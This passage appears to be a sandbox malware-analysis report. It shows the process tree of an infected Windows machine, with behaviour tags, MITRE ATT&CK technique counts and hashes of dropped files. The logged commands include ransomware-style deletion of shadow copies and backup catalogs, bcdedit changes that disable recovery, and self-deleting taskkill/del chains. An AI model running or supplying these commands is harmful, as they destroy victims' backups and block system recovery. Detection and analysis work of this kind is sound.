                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      PID:5384
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 9D5A66E096A8BA977BC32C5FDCEB42C1 C
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:8964
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 01B06043DE8CC5863E3B48558FAAA66C C
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:8952
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding E1D4D95C9EE288B8F48783A71D184114
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:6836
                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding B3AB8D079207E3EDA9E14F5A77DC404E C
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3056
                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                        PID:4676
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          PID:6296
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5873.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5873.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        PID:5988
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5873.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5873.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          PID:9212
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 5873.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5873.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                            PID:8856
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill /im 5873.exe /f
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:6564
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                              PID:2072
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5CAA.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5CAA.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        PID:6668
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 5CAA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5CAA.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:8736
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill /im 5CAA.exe /f
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:6420
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                              PID:7760
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\739E.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\739E.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                          PID:8436
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -start
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                            PID:8668
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -agent 0
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies extensions of user files
                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                              PID:8188
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:8072
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                  wmic shadowcopy delete
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:7824
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                                    PID:7212
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:6520
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                                      PID:8812
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4992
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5220
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:7456
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:2084
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                              wmic shadowcopy delete
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:2684
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                              notepad.exe
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:8428
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                              notepad.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1816
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:8616
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:8724
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:8904
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                    PID:9180
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:8340
                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      PID:8576
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:9028
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                        PID:4956
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:7028
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          PID:1488
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                            PID:4184
                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:64
                                                                                                                                                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:6400
                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              PID:7788
                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4ec507da-edb0-0b41-95a9-b50173c3a005}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                PID:1552
                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                PID:9192
                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              PID:4352
                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:8460
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:1052
                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                PID:1648
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                PID:3952
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                  MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                  PID:7336
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6972
                                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:9196
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                  PID:6768
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:1060
                                                                                                                                                                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7256
                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                    PID:8924
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    PID:2684
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                    PID:2348

                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1089

                                                                                                                                                                                                                                                                                  File Deletion

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1107

                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                  T1081

                                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1018

                                                                                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                                  Impact

                                                                                                                                                                                                                                                                                  Inhibit System Recovery

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1490

                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MkUJBpTtAfGlkX4du8wRlRNU.exe.log
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RrOS_NpsYb1qjEyd619lZYW1.exe.log
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\0SDRNlaKVLytRdopwwPIYaS2.exe
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    db8cf4e92619e3eda4f719f936da7e61

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    96360b660ae235a93347b19a710d60732da3671c

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    f0f511b46423f615a66f071b758f77f6a7f3c65cfc274eb38633070068cf5578

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    1b3ea6dc08a981dbde460ae500e2f7baa674db79962c0021647c710f19248e5a48338127ea5c266f9ed80ffb999454ed17a40e99e2731d54ac36531ea9c31816

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\0SDRNlaKVLytRdopwwPIYaS2.exe
                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    db8cf4e92619e3eda4f719f936da7e61

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    96360b660ae235a93347b19a710d60732da3671c

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    f0f511b46423f615a66f071b758f77f6a7f3c65cfc274eb38633070068cf5578

                                                                                                                                                                                                                                                                                    SHA512

